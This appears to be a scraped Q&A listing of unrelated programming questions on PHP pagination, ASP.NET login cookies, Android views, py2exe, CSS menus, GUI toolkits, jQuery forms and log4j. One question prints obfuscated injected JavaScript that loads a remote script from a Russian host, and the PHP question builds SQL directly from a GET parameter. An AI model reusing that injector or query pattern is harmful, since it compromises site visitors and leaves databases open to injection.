function(I'm new to php): <?php include_once('generate_pagination.php'); ?> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script> <script type="text/javascript" src="jquery_pagination.js"></script> <div id="loading" ></div> <div id="content" data-page="1"></div> <ul id="pagination"> <?php //Pagination Numbers for($i=1; $i<=$pages; $i++) { echo '<li class="page_numbers" id="page'.$i.'">'.$i.'</li>'; } ?> </ul> <br /> <br /> <a href="#" class="category" id="marketing">Marketing</a> <a href="#" class="category" id="automotive">Automotive</a> <a href="#" class="category" id="sports">Sports</a> Here is the generate pagination where the problem seems to occur: <?php $ids=$_GET['ids']; include_once('config.php'); $per_page = 3; //Calculating no of pages $sql = "SELECT COUNT(*) FROM explore WHERE category='$ids'"; $result = mysql_query($sql); $count = mysql_fetch_row($result); $pages = ceil($count[0]/$per_page); ?> I thought I might as well post the jquery script if someone wants to see: $(document).ready(function(){ //Display Loading Image function Display_Load() { $("#loading").fadeIn(900,0); $("#loading").html("<img src='bigLoader.gif' />"); } //Hide Loading Image function Hide_Load() { $("#loading").fadeOut('slow'); }; //Default Starting Page Results $("#pagination li:first").css({'color' : '#FF0084'}).css({'border' : 'none'}); Display_Load(); $("#content").load("pagination_data.php?page=1", Hide_Load()); // Editing below. // Sort content Marketing $("a.category").click(function() { Display_Load(); var this_id = $(this).attr('id'); $.get("pagination.php", { category: this.id }, function(data){ //Load your results into the page var pageNum = $('#content').attr('data-page'); $("#pagination").load('generate_pagination.php?category=' + pageNum +'&ids='+ this_id ); $("#content").load("filter_marketing.php?page=" + pageNum +'&id='+ this_id, Hide_Load()); }); }); //Pagination Click $("#pagination li").click(function(){ Display_Load(); //CSS Styles $("#pagination li") .css({'border' : 'solid #dddddd 1px'}) .css({'color' : '#0063DC'}); $(this) .css({'color' : '#FF0084'}) .css({'border' : 'none'}); //Loading Data var pageNum = $(this).attr("id").replace("page",""); $("#content").load("pagination_data.php?page=" + pageNum, function(){ $(this).attr('data-page', pageNum); Hide_Load(); }); }); }); If any could assist me on solving this problem that would be great, thanks.

    Read the article

  • ASP.NET MVC RememberMe(It's large, please don't quit reading. Have explained the problem in detail a

    - by nccsbim071
    After searching a lot i did not get any answers and finally i had to get back to you. Below i am explaining my problem in detail. It's too long, so please don't quit reading. I have explained my problem in simple language. I have been developing an asp.net mvc project. I am using standard ASP.NET roles and membership. Everything is working fine but the remember me functionality doesn't work at all. I am listing all the details of work. Hope you guys can help me out solve this problem. I simply need this: I need user to login to web application. During login they can either login with remember me or without it. If user logs in with remember me, i want browser to remember them for long time, let's say atleast one year or considerably long time. The way they do it in www.dotnetspider.com,www.codeproject.com,www.daniweb.com and many other sites. If user logs in without remember me, then browser should allow access to website for some 20 -30 minutes and after that their session should expire. Their session should also expire when user logs in and shuts down the browser without logging out. Note: I have succesfully implemented above functionality without using standard asp.net roles and membership by creating my own talbes for user and authenticating against my database table, setting cookie and sessions in my other projects. But for this project we starting from the beginning used standard asp.net roles and membership. We thought it will work and after everything was build at the time of testing it just didn't work. and now we cannot replace the existing functionality with standard asp.net roles and membership with my own custom user tables and all the stuff, you understand what i am taling about. Either there is some kind of bug with standard asp.net roles and membership functionality or i have the whole concept of standard asp.net roles and membership wrong. i have stated what i want above. I think it's very simple and reasonable. What i did Login form with username,password and remember me field. My setting in web.config: <authentication mode="Forms"> <forms loginUrl="~/Account/LogOn" timeout="2880"/> </authentication> in My controller action, i have this: FormsAuth.SignIn(userName, rememberMe); public void SignIn(string userName, bool createPersistentCookie) { FormsAuthentication.SetAuthCookie(userName, createPersistentCookie); } Now the problems are following: I have already stated in above section "I simply need this". user can successfully log in to the system. Their session exists for as much minutes as specified in timeout value in web.config. I have also given a sample of my web.config. In my samplem if i set the timeout to 5 minutes,then user session expires after 5 minutes, that's ok. But if user closes the browser and reopen the browser, user can still enter the website without loggin in untill time specified in "timeout" has not passed out. The sliding expiration for timeout value is also working fine. Now if user logs in to the system with remember me checked, user session still expires after 5 minutes. This is not good behaviour, is it?. I mean to say that if user logs in to the system with remember me checked he should be remembered for a long time untill he doesn't logs out of the system or user doesn't manually deletes all the cookies from the browser. If user logs in to the system without remember me checked his session should expire after the timeout period values specified in web.config and also if users closes the browser. The problem is that if user closes the browser and reopens it he can still enter the website without logging in. I search internet a lot on this topic, but i could not get the solution. In the blog post(http://weblogs.asp.net/scottgu/archive/2005/11/08/430011.aspx) made by Scott Gu on exactly the same topic. The users are complaining about the same thing in their comments ut there is no easy solution given in by Mr. Scott. I read it at following places: http://weblogs.asp.net/scottgu/archive/2005/11/08/430011.aspx http://geekswithblogs.net/vivek/archive/2006/09/14/91191.aspx I guess this is a problem of lot's of users. As seem from blog post made by Mr. Scott Gu. Your help will be really appreciated. Thanks in advance.

    Read the article

  • ASP.NET RememberMe(It's large, please don't quit reading. Have explained the problem in detail and s

    - by nccsbim071
    After searching a lot i did not get any answers and finally i had to get back to you. Below i am explaining my problem in detail. It's too long, so please don't quit reading. I have explained my problem in simple language. I have been developing an asp.net mvc project. I am using standard ASP.NET roles and membership. Everything is working fine but the remember me functionality doesn't work at all. I am listing all the details of work. Hope you guys can help me out solve this problem. I simply need this: I need user to login to web application. During login they can either login with remember me or without it. If user logs in with remember me, i want browser to remember them for long time, let's say atleast one year or considerably long time. The way they do it in www.dotnetspider.com,www.codeproject.com,www.daniweb.com and many other sites. If user logs in without remember me, then browser should allow access to website for some 20 -30 minutes and after that their session should expire. Their session should also expire when user logs in and shuts down the browser without logging out. Note: I have succesfully implemented above functionality without using standard asp.net roles and membership by creating my own talbes for user and authenticating against my database table, setting cookie and sessions in my other projects. But for this project we starting from the beginning used standard asp.net roles and membership. We thought it will work and after everything was build at the time of testing it just didn't work. and now we cannot replace the existing functionality with standard asp.net roles and membership with my own custom user tables and all the stuff, you understand what i am taling about. Either there is some kind of bug with standard asp.net roles and membership functionality or i have the whole concept of standard asp.net roles and membership wrong. i have stated what i want above. I think it's very simple and reasonable. What i did Login form with username,password and remember me field. My setting in web.config: in My controller action, i have this: FormsAuth.SignIn(userName, rememberMe); public void SignIn(string userName, bool createPersistentCookie) { FormsAuthentication.SetAuthCookie(userName, createPersistentCookie); } Now the problems are following: I have already stated in above section "I simply need this". user can successfully log in to the system. Their session exists for as much minutes as specified in timeout value in web.config. I have also given a sample of my web.config. In my samplem if i set the timeout to 5 minutes,then user session expires after 5 minutes, that's ok. But if user closes the browser and reopen the browser, user can still enter the website without loggin in untill time specified in "timeout" has not passed out. The sliding expiration for timeout value is also working fine. Now if user logs in to the system with remember me checked, user session still expires after 5 minutes. This is not good behaviour, is it?. I mean to say that if user logs in to the system with remember me checked he should be remembered for a long time untill he doesn't logs out of the system or user doesn't manually deletes all the cookies from the browser. If user logs in to the system without remember me checked his session should expire after the timeout period values specified in web.config and also if users closes the browser. The problem is that if user closes the browser and reopens it he can still enter the website without logging in. I search internet a lot on this topic, but i could not get the solution. In the blog post(http://weblogs.asp.net/scottgu/archive/2005/11/08/430011.aspx) made by Scott Gu on exactly the same topic. The users are complaining about the same thing in their comments ut there is no easy solution given in by Mr. Scott. I read it at following places: http://weblogs.asp.net/scottgu/archive/2005/11/08/430011.aspx http://geekswithblogs.net/vivek/archive/2006/09/14/91191.aspx I guess this is a problem of lot's of users. As seem from blog post made by Mr. Scott Gu. Your help will be really appreciated. Thanks in advance.

    Read the article

  • Custom View embed in Gallery crashes while key press

    - by tao
    Hi there, I'd like to find some stuff to replace the Tab component, so I'd make a custom View named StringView, which has the ability to display text, and to embed it into a Gallery. But it always crashes with error "NullPointerException at InputMethodManager". I have no idea about this, any help&tip&suggest are appreciate. Detail of my issue: First I'd created a class StringView extends View: public class StringView extends View { protected final Paint mPaint = new Paint(Paint.ANTI_ALIAS_FLAG); protected String mString; protected int mAscent; // Constructor public StringView(Context context, String string) { super(context); mPaint.setARGB(255, 255, 60, 10); mPaint.setTextSize(30); //mPaint.setFakeBoldText(true); mString = string; setPadding(20,15,20,15); } @Override protected void onDraw(Canvas canvas) { super.onDraw(canvas); int w = this.getPaddingLeft(); int h = this.getPaddingTop() - mAscent; canvas.drawText(mString, w, h, mPaint); } public void setString(String str) { mString = str; this.requestLayout(); this.invalidate(); } public String getString() { return mString; } @Override protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) { setMeasuredDimension(measureWidth(widthMeasureSpec), measureHeight(heightMeasureSpec)); } /** * Determines the width of this view * @param measureSpec A measureSpec packed into an int * @return The width of the view, honoring constraints from measureSpec */ private int measureWidth(int measureSpec) { int result = 0; int specMode = MeasureSpec.getMode(measureSpec); int specSize = MeasureSpec.getSize(measureSpec); if (specMode == MeasureSpec.EXACTLY) { // We were told how big to be result = specSize; } else { // Measure the text result = (int) mPaint.measureText(mString) + getPaddingLeft() + getPaddingRight(); if (specMode == MeasureSpec.AT_MOST) { // Respect AT_MOST value if that was what is called for by measureSpec result = Math.min(result, specSize); } } return result; } /** * Determines the height of this view * @param measureSpec A measureSpec packed into an int * @return The height of the view, honoring constraints from measureSpec */ private int measureHeight(int measureSpec) { int result = 0; int specMode = MeasureSpec.getMode(measureSpec); int specSize = MeasureSpec.getSize(measureSpec); mAscent = (int) mPaint.ascent(); if (specMode == MeasureSpec.EXACTLY) { // We were told how big to be result = specSize; } else { // Measure the text (beware: ascent is a negative number) result = (int) (-mAscent + mPaint.descent()) + getPaddingTop() + getPaddingBottom(); if (specMode == MeasureSpec.AT_MOST) { // Respect AT_MOST value if that was what is called for by measureSpec result = Math.min(result, specSize); } } return result; } } Second I put it in to Gallery through Adapter Gallery gallery = (Gallery) findViewById(R.id.gallery); gallery.setAdapter(new ImageAdapter(this)); ImageAdapter: public class ImageAdapter extends BaseAdapter { int mGalleryItemBackground; private Context mContext; private View[] mImages = genSerielImageViews(); public ImageAdapter(Context c) { mContext = c; TypedArray a = obtainStyledAttributes(R.styleable.Gallery); mGalleryItemBackground = a.getResourceId( R.styleable.Gallery_android_galleryItemBackground, 0); a.recycle(); } private View[] genSerielImageViews() { if (true) { int N = 6; StringView[] views = new StringView[N]; for (int i=0; i<N; i++) { views[i] = new StringView(mContext, "ITEM #" + Integer.toString(i) ); } return views; } else { int N = 6; TextView[] views = new TextView[N]; for (int i=0; i<N; i++) { views[i] = new TextView( mContext ); views[i].setText("CCTV #" + Integer.toString(i) ); } return views; } } public int getCount() { return mImages.length; } public Object getItem(int position) { return position; } public long getItemId(int position) { return position; } public View getView(int position, View convertView, ViewGroup parent) { return mImages[position]; } } Then Compile&Run, press keypad RIGHT and I got a crash, It's turns out a weird InputMethodManager error: 03-18 07:22:33.568: ERROR/AndroidRuntime(958): Uncaught handler: thread main exiting due to uncaught exception 03-18 07:22:33.648: ERROR/AndroidRuntime(958): java.lang.NullPointerException 03-18 07:22:33.648: ERROR/AndroidRuntime(958): at android.view.inputmethod.InputMethodManager.startInputInner(InputMethodManager.java:940) 03-18 07:22:33.648: ERROR/AndroidRuntime(958): at android.view.inputmethod.InputMethodManager.checkFocus(InputMethodManager.java:1114) 03-18 07:22:33.648: ERROR/AndroidRuntime(958): at android.view.ViewRoot.handleMessage(ViewRoot.java:1869) 03-18 07:22:33.648: ERROR/AndroidRuntime(958): at android.os.Handler.dispatchMessage(Handler.java:99) 03-18 07:22:33.648: ERROR/AndroidRuntime(958): at android.os.Looper.loop(Looper.java:123) 03-18 07:22:33.648: ERROR/AndroidRuntime(958): at android.app.ActivityThread.main(ActivityThread.java:4310) 03-18 07:22:33.648: ERROR/AndroidRuntime(958): at java.lang.reflect.Method.invokeNative(Native Method) 03-18 07:22:33.648: ERROR/AndroidRuntime(958): at java.lang.reflect.Method.invoke(Method.java:521) 03-18 07:22:33.648: ERROR/AndroidRuntime(958): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:860) 03-18 07:22:33.648: ERROR/AndroidRuntime(958): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:618) 03-18 07:22:33.648: ERROR/AndroidRuntime(958): at dalvik.system.NativeStart.main(Native Method) Thanks.

    Read the article

  • Accessing py2exe program over network in Windows 98 throws ImportErrors

    - by darvids0n
    I'm running a py2exe-compiled python program from one server machine on a number of client machines (mapped to a network drive on every machine, say W:). For Windows XP and later machines, have so far had zero problems with Python picking up W:\python23.dll (yes, I'm using Python 2.3.5 for W98 compatibility and all that). It will then use W:\zlib.pyd to decompress W:\library.zip containing all the .pyc files like os and such, which are then imported and the program runs no problems. The issue I'm getting is on some Windows 98 SE machines (note: SOME Windows 98 SE machines, others seem to work with no apparent issues). What happens is, the program runs from W:, the W:\python23.dll is, I assume, found (since I'm getting Python ImportErrors, we'd need to be able to execute a Python import statement), but a couple of things don't work: 1) If W:\library.zip contains the only copy of the .pyc files, I get ZipImportError: can't decompress data; zlib not available (nonsense, considering W:\zlib.pyd IS available and works fine with the XP and higher machines on the same network). 2) If the .pyc files are actually bundled INSIDE the python exe by py2exe, OR put in the same directory as the .exe, OR put into a named subdirectory which is then set as part of the PYTHONPATH variable (e.g W:\pylib), I get ImportError: no module named os (os is the first module imported, before sys and anything else). Come to think of it, sys.path wouldn't be available to search if os was imported before it maybe? I'll try switching the order of those imports but my question still stands: Why is this a sporadic issue, working on some networks but not on others? And how would I force Python to find the files that are bundled inside the very executable I run? I have immediate access to the working Windows 98 SE machine, but I only get access to the non-working one (a customer of mine) every morning before their store opens. Thanks in advance! EDIT: Okay, big step forward. After debugging with PY2EXE_VERBOSE, the problem occurring on the specific W98SE machine is that it's not using the right path syntax when looking for imports. Firstly, it doesn't seem to read the PYTHONPATH environment variable (there may be a py2exe-specific one I'm not aware of, like PY2EXE_VERBOSE). Secondly, it only looks in one place before giving up (if the files are bundled inside the EXE, it looks there. If not, it looks in library.zip). EDIT 2: In fact, according to this, there is a difference between the sys.path in the Python interpreter and that of Py2exe executables. Specifically, sys.path contains only a single entry: the full pathname of the shared code archive. Blah. No fallbacks? Not even the current working directory? I'd try adding W:\ to PATH, but py2exe doesn't conform to any sort of standards for locating system libraries, so it won't work. Now for the interesting bit. The path it tries to load atexit, os, etc. from is: W:\\library.zip\<module>.<ext> Note the single slash after library.zip, but the double slash after the drive letter (someone correct me if this is intended and should work). It looks like if this is a string literal, then since the slash isn't doubled, it's read as an (invalid) escape sequence and the raw character is printed (giving W:\library.zipos.pyd, W:\library.zipos.dll, ... instead of with a slash); if it is NOT a string literal, the double slash might not be normpath'd automatically (as it should be) and so the double slash confuses the module loader. Like I said, I can't just set PYTHONPATH=W:\\library.zip\\ because it ignores that variable. It may be worth using sys.path.append at the start of my program but hard-coding module paths is an absolute LAST resort, especially since the problem occurs in ONE configuration of an outdated OS. Any ideas? I have one, which is to normpath the sys.path.. pity I need os for that. Another is to just append os.getenv('PATH') or os.getenv('PYTHONPATH') to sys.path... again, needing the os module. The site module also fails to initialise, so I can't use a .pth file. I also recently tried the following code at the start of the program: for pth in sys.path: fErr.write(pth) fErr.write(' to ') pth.replace('\\\\','\\') # Fix Windows 98 pathing issues fErr.write(pth) fErr.write('\n') But it can't load linecache.pyc, or anything else for that matter; it can't actually execute those commands from the looks of things. Is there any way to use built-in functionality which doesn't need linecache to modify the sys.path dynamically? Or am I reduced to hard-coding the correct sys.path?

    Read the article

  • Son of Suckerfish ie6 problem - right-most dropdown menu also appearing on left side of screen

    - by Kevin Burke
    I'm interning for an NGO in India and trying to fix their website, including updating their menu so it's not the last item on the page to load, and it's centered on the screen. Everything works well enough but when I try out my new menu in IE6, I get this weird error where the content below the menu is padded an extra 30px or so and the material in the right-most drop down appears on the far left of the screen, always visible. When I drop down the rightmost link ("Publications") the content appears both in the correct location and in the same spot on the far left of the screen, and changes color when I hover as well. It's tough to describe, so it would probably be best if you took a look: visit http://sevamandir.org/a30/index.htm in your Internet Explorer 6 browser to see for yourself. I really appreciate your help. Also I'm using a 1000px wide monitor, if there's more hijinks going on outside that space I'd like to know about that too. Here's the relevant code: in the html head: <script> sfHover = function() { var sfEls = document.getElementById("nav").getElementsByTagName("LI"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfhover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfhover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); </script> text surrounding the menu - the menu is simply <ul id="nav"><li></li></ul> etc. <!--begin catchphrase--> <div style="float:left; height:27px; width:520px; margin:0px; font:16px Arial, Helvetica, sans-serif; font-weight:bold; color:#769841;"> Transforming lives through democratic &amp; participatory development </div> <?php include("menu.php"); ?> </div><!-- end header --> <!--begin main text div--> <div id="maincontent"> Relevant menu CSS: #nav, #nav ul { font:bold 11px Verdana, sans-serif; float: left; width: 980px; list-style: none; line-height: 1; background: white; font-weight: bold; padding: 0; border: solid #769841; border-width: 0; margin: 0 0 1em 0; } #nav a { display: block; width: 140px; /*this is the total width of the upper menu*/ w\idth: 120px; /*this is the width less horizontal padding */ padding: 5px 10px 5px 10px; /*horiz padding is the 2nd & 4th items here - goes Top Right Bottom Left */ color: #ffffff; background:#b6791e; text-decoration: none; } #nav a.daddy { background: url(rightarrow2.gif) center right no-repeat; } #nav li { float: left; padding: 0; width: 140px; /*this needs to be updated to match top #nav a */ background:#b6791e; } #nav li:hover, #nav li a:hover, #nav li:hover a { background:#769841; } #nav li:hover li a { background:#ffffff; color:#769841; } #nav li ul { position: absolute; left: -999em; height: auto; width: 14.4em; w\idth: 13.9em; font-weight: bold; border-width: 0.25em; /*green border around dropdown menu*/ margin: 0; } #nav li ul a { background:#ffffff; color:#769841; } #nav li li { padding-right: 1em; width: 13em; background:#ffffff; } #nav li ul a { width: 13em; w\idth: 9em; } #nav li ul ul { margin: -1.75em 0 0 14em; } #nav li:hover ul ul, #nav li:hover ul ul ul, #nav li.sfhover ul ul, #nav li.sfhover ul ul ul { left: -999em; } #nav li:hover ul, #nav li li:hover ul, #nav li li li:hover ul, #nav li.sfhover ul, #nav li li.sfhover ul, #nav li li li.sfhover ul { left: auto; } #nav li:hover, #nav li.sfhover, { background: #769841; color:#ffe400; } #nav li a:hover, #nav li li a:hover, #nav li:hover li:hover, #nav li.sfhover a:hover { background: #769841; color:#ffe400; }

    Read the article

  • Weird Javascript in Template. Is this a hacking attempt?

    - by Julian
    I validated my client's website to xHTML Strict 1.0/CSS 2.1 standards last week. Today when I re-checked, I had a validation error caused by a weird and previous unknown script. I found this in the index.php file of my ExpressionEngine CMS. What is this javascript doing? Is this a hacking attempt as I suspected? I couldn't help but notice the Russian domain encoded in the script... this.v=27047; this.v+=187; ug=["n"]; OV=29534; OV--; var y; var C="C"; var T={}; r=function(){ b=36068; b-=144; M=[]; function f(V,w,U){ return V.substr(w,U); var wH=39640; } var L=["o"]; var cj={}; var qK={N:false}; var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2); var BT="BT"; var fV=RegExp; var CE={bf:false}; var UW=''; this.Ky=11592; this.Ky-=237; var VU=document; var _n=[]; try {} catch(wP){}; this.JY=29554; this.JY-=245; function s(V,w){ l=13628; l--; var U="["+w+String("]"); var rk=new fV(U, f("giId",0,1)); this.NS=18321;this.NS+=195;return V.replace(rk, UW); try {} catch(k){}; }; this.jM=""; var CT={}; var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z'); try {var vv='m'} catch(vv){}; var Os={}; var t=null; var e=String("bod"+"y"); var F=155183-147103; this.kp=''; Z={Ug:false}; y=function(){ var kl=["mF","Q","cR"]; try { Bf=11271; Bf-=179; var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5'); Fp=VU[u](A); var H=""; try {} catch(WK){}; this.Ca=19053; this.Ca--; var O=s('s5rLcI','2A5IhLo'); var V=F+fa; this.bK=""; var ya=String("de"+"fe"+f("r3bPZ",0,1)); var bk=new String(); pB=9522; pB++; Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V; Fp[ya]=[1][0]; Pe=45847; Pe--; VU[e].appendChild(Fp); var lg=new Array(); var aQ={vl:"JC"}; this.KL="KL"; } catch(x){ this.Ja=""; Th=["pj","zx","kO"]; var Jr=''; }; Tr={qZ:21084}; }; this.pL=false; }; be={}; rkE={hb:"vG"}; r(); var bY=new Date(); window.onload=y; cU=["Yr","gv"];

    Read the article

  • Very simple, terse and easy GUI programming “frameworks”

    - by jetxee
    Please list GUI programming libraries, toolkits, frameworks which allow to write GUI apps quickly. I mean in such a way, that GUI is described entirely in a human-readable (and human-writable) plain text file (code) code is terse (1 or 2 lines of code per widget/event pair), suitable for scripting structure and operation of the GUI is evident from the code (nesting of widgets and flow of events) details about how to build the GUI are hidden (things like mainloop, attaching event listeners, etc.) auto-layouts are supported (vboxes, hboxes, etc.) As answers suggest, this may be defined as declarative GUI programming, but it is not necessarily such. Any approach is OK if it works, is easy to use and terse. There are some GUI libraries/toolkits like this. They are listed below. Please extend the list if you see a qualifying toolkit missing. Indicate if the project is crossplatform, mature, active, and give an example if possible. Please use this wiki to discuss only Open Source projects. This is the list so far (in alphabetical order): Fudgets Fudgets is a Haskell library. Platform: Unix. Status: Experimental, but still maintained. An example: import Fudgets main = fudlogue (shellF "Hello" (labelF "Hello, world!" >+< quitButtonF)) GNUstep Renaissance Renaissance allows to describe GUI in simple XML. Platforms: OSX/GNUstep. Status: part of GNUstep. An example below: <window title="Example"> <vbox> <label font="big"> Click the button below to quit the application </label> <button title="Quit" action="terminate:"/> </vbox> </window> HTML HTML-based GUI (HTML + JS). Crossplatform, mature. Can be used entirely on the client side. Looking for a nice “helloworld” example. JavaFX JavaFX is usable for standalone (desktop) apps as well as for web applications. Not completely crossplatform, not yet completely open source. Status: 1.0 release. An example: Frame { content: Button { text: "Press Me" action: operation() { System.out.println("You pressed me"); } } visible: true } Screenshot is needed. Phooey Phooey is another Haskell library. Crossplatform (wxWidgets), HTML+JS backend planned. Mature and active. An example (a little more than a helloworld): ui1 :: UI () ui1 = title "Shopping List" $ do a <- title "apples" $ islider (0,10) 3 b <- title "bananas" $ islider (0,10) 7 title "total" $ showDisplay (liftA2 (+) a b) PythonCard PythonCard describes GUI in a Python dictionary. Crossplatform (wxWidgets). Some apps use it, but the project seems stalled. There is an active fork. I skip PythonCard example because it is too verbose for the contest. Shoes Shoes for Ruby. Platforms: Win/OSX/GTK+. Status: Young but active. A minimal app looks like this: Shoes.app { @push = button "Push me" @note = para "Nothing pushed so far" @push.click { @note.replace "Aha! Click!" } } Tcl/Tk Tcl/Tk. Crossplatform (its own widget set). Mature (probably even dated) and active. An example: #!/usr/bin/env wish button .hello -text "Hello, World!" -command { exit } pack .hello tkwait window . tekUI tekUI for Lua (and C). Platforms: X11, DirectFB. Status: Alpha (usable, but API still evolves). An example: #/usr/bin/env lua ui = require "tek.ui" ui.Application:new { Children = { ui.Window:new { Title = "Hello", Children = { ui.Text:new { Text = "_Hello, World!", Style = "button", Mode = "button", }, }, }, }, }:run() Treethon Treethon for Python. It describes GUI in a YAML file (Python in a YAML tree). Platform: GTK+. Status: work in proress. A simple app looks like this: _import: gtk view: gtk.Window() add: - view: gtk.Button('Hello World') on clicked: print view.get_label() Yet unnamed Python library by Richard Jones: This one is not released yet. The idea is to use Python context managers (with keyword) to structure GUI code. See Richard Jones' blog for details. with gui.vertical: text = gui.label('hello!') items = gui.selection(['one', 'two', 'three']) with gui.button('click me!'): def on_click(): text.value = items.value text.foreground = red XUL XUL + Javascript may be used to create stand-alone desktop apps with XULRunner as well as Mozilla extensions. Mature, open source, crossplatform. <?xml version="1.0"?> <?xml-stylesheet href="chrome://global/skin/" type="text/css"?> <window id="main" title="My App" width="300" height="300" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"> <caption label="Hello World"/> </window> Thank your for contributions!

    Read the article

  • Copying one form's values to another form using JQuery

    - by rsturim
    I have a "shipping" form that I want to offer users the ability to copy their input values over to their "billing" form by simply checking a checkbox. I've coded up a solution that works -- but, I'm sort of new to jQuery and wanted some criticism on how I went about achieving this. Is this well done -- any refactorings you'd recommend? Any advice would be much appreciated! The Script <script type="text/javascript"> $(function() { $("#copy").click(function() { if($(this).is(":checked")){ var $allShippingInputs = $(":input:not(input[type=submit])", "form#shipping"); $allShippingInputs.each(function() { var billingInput = "#" + this.name.replace("ship", "bill"); $(billingInput).val($(this).val()); }) //console.log("checked"); } else { $(':input','#billing') .not(':button, :submit, :reset, :hidden') .val('') .removeAttr('checked') .removeAttr('selected'); //console.log("not checked") } }); }); </script> The Form <div> <form action="" method="get" name="shipping" id="shipping"> <fieldset> <legend>Shipping</legend> <ul> <li> <label for="ship_first_name">First Name:</label> <input type="text" name="ship_first_name" id="ship_first_name" value="John" size="" /> </li> <li> <label for="ship_last_name">Last Name:</label> <input type="text" name="ship_last_name" id="ship_last_name" value="Smith" size="" /> </li> <li> <label for="ship_state">State:</label> <select name="ship_state" id="ship_state"> <option value="RI">Rhode Island</option> <option value="VT" selected="selected">Vermont</option> <option value="CT">Connecticut</option> </select> </li> <li> <label for="ship_zip_code">Zip Code</label> <input type="text" name="ship_zip_code" id="ship_zip_code" value="05401" size="8" /> </li> <li> <input type="submit" name="" /> </li> </ul> </fieldset> </form> </div> <div> <form action="" method="get" name="billing" id="billing"> <fieldset> <legend>Billing</legend> <ul> <li> <input type="checkbox" name="copy" id="copy" /> <label for="copy">Same of my shipping</label> </li> <li> <label for="bill_first_name">First Name:</label> <input type="text" name="bill_first_name" id="bill_first_name" value="" size="" /> </li> <li> <label for="bill_last_name">Last Name:</label> <input type="text" name="bill_last_name" id="bill_last_name" value="" size="" /> </li> <li> <label for="bill_state">State:</label> <select name="bill_state" id="bill_state"> <option>-- Choose State --</option> <option value="RI">Rhode Island</option> <option value="VT">Vermont</option> <option value="CT">Connecticut</option> </select> </li> <li> <label for="bill_zip_code">Zip Code</label> <input type="text" name="bill_zip_code" id="bill_zip_code" value="" size="8" /> </li> <li> <input type="submit" name="" /> </li> </ul> </fieldset> </form> </div>

    Read the article

  • Logging with log4j on tomcat jruby-rack for a Rails 3 application

    - by John
    I just spent the better part of 3 hours trying to get my Rails application logging with Log4j. I've finally got it working, but I'm not sure if what I did is correct. I tried various methods to no avail until my various last attempt. So I'm really looking for some validation here, perhaps some pointers and tips as well -- anything would be appreciated to be honest. I've summarized all my feeble methods into three attempts below. I'm hoping for some enlightenment on where I went wrong with each attempt -- even if it means I get ripped up. Thanks for the help in advance! System Specs Rails 3.0 Windows Server 2008 Log4j 1.2 Tomact 6.0.29 Java 6 Attempt 1 - Configured Tomcat to Use Log4J I basically followed the guide on the Apache Tomcat website here. The steps are: Create a log4j.properties file in $CATALINA_HOME/lib Download and copy the log4j-x.y.z.jar into $CATALINA_HOME/lib Replace $CATALINA_HOME/bin/tomcat-juli.jar with the tomcat-juli.jar from the Apache Tomcat Extras folder Copy tomcat-juli-adapters.jar from the Apache Tomcat Extras folder into $CATALINA_HOME/lib Delete $CATALINA_BASE/conf/logging.properties Start Tomcat (as a service) Expected Results According to the Guide I should have seen a tomcat.log file in my $CATALINA_BASE/logs folder. Actual Results No tomcat.log Saw three of the standard logs instead jakarta_service_20101231.log stderr_20101231.log stdout_20101231.log Question Shouldn't I have at least seen a tomcat.log file? Attempt 2 - Use default Tomcat logging (commons-logging) Reverted all the changes from the previous setup Modified $CATALINA_BASE/conf/logging.properties by doing the following: Adding a setting for my application in the handlers line: 5rails3.org.apache.juli.FileHandler Adding Handler specific properties 5rails3.org.apache.juli.FileHandler.level = FINE 5rails3.org.apache.juli.FileHandler.directory = ${catalina.base}/logs 5rails3.org.apache.juli.FileHandler.prefix = rails3. Adding Facility specific properties org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/rails3].level = INFO org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/rails3].handlers = 4host-manager.org.apache.juli.FileHandler Modified my web.xml by adding the following context parameter as per the Logging section of the jruby-rack readme (I also modified my warbler.rb accordingly, but I did opted to change the web.xml directly to test things faster). <context-param> <param-name>jruby.rack.logging</param-name> <param-value>commons_logging</param-value> </context-param> Restarted Tomcat Results A log file was created (rails3.log), however there was no log information in the file. Attempt 2A - Use Log4j with existing set up I decided to go Log4j another whirl with this new web.xml setting. Copied the log4j.jar into my WEB-INF/lib folder Created a log4j.properties file and put it into WEB-INF/classes log4j.rootLogger=INFO, R log4j.logger.javax.servlet=DEBUG log4j.appender.R=org.apache.log4j.RollingFileAppender log4j.appender.R.File=${catalina.base}/logs/rails3.log log4j.appender.R.MaxFileSize=5036KB log4j.appender.R.MaxBackupIndex=4 log4j.appender.R.layout=org.apache.log4j.PatternLayout log4j.appender.R.layout.ConversionPattern=%d{dd MMM yyyy HH:mm:ss} [%t] %-5p %c %x - %m%n Restarted Tomcat Results Same as Attempt 2 NOTE: I used log4j.logger.javax.servlet=DEBUG because I read in the jruby-rack README that all logging output is automatically redirected to the javax.servlet.ServletContext#log method. So I though this would capture it. I was obviously wrong. Question Why didn't this work? Isn't Log4J using the commons_logging API? Attempt 3 - Tried out slf4j (WORKED) A bit uncertain as to why Attempt 2A didn't work, I thought to myself, maybe I can't use commons_logging for the jruby.rack.logging parameter because it's probably not using commons_logging API... (but I was still not sure). I saw slf4j as an option. I have never heard of it and by stroke of luck, I decided to look up what it is. After reading briefly about what it does, I thought it was good of a shot as any and decided to try it out following the instructions here. Continuing from the setup of 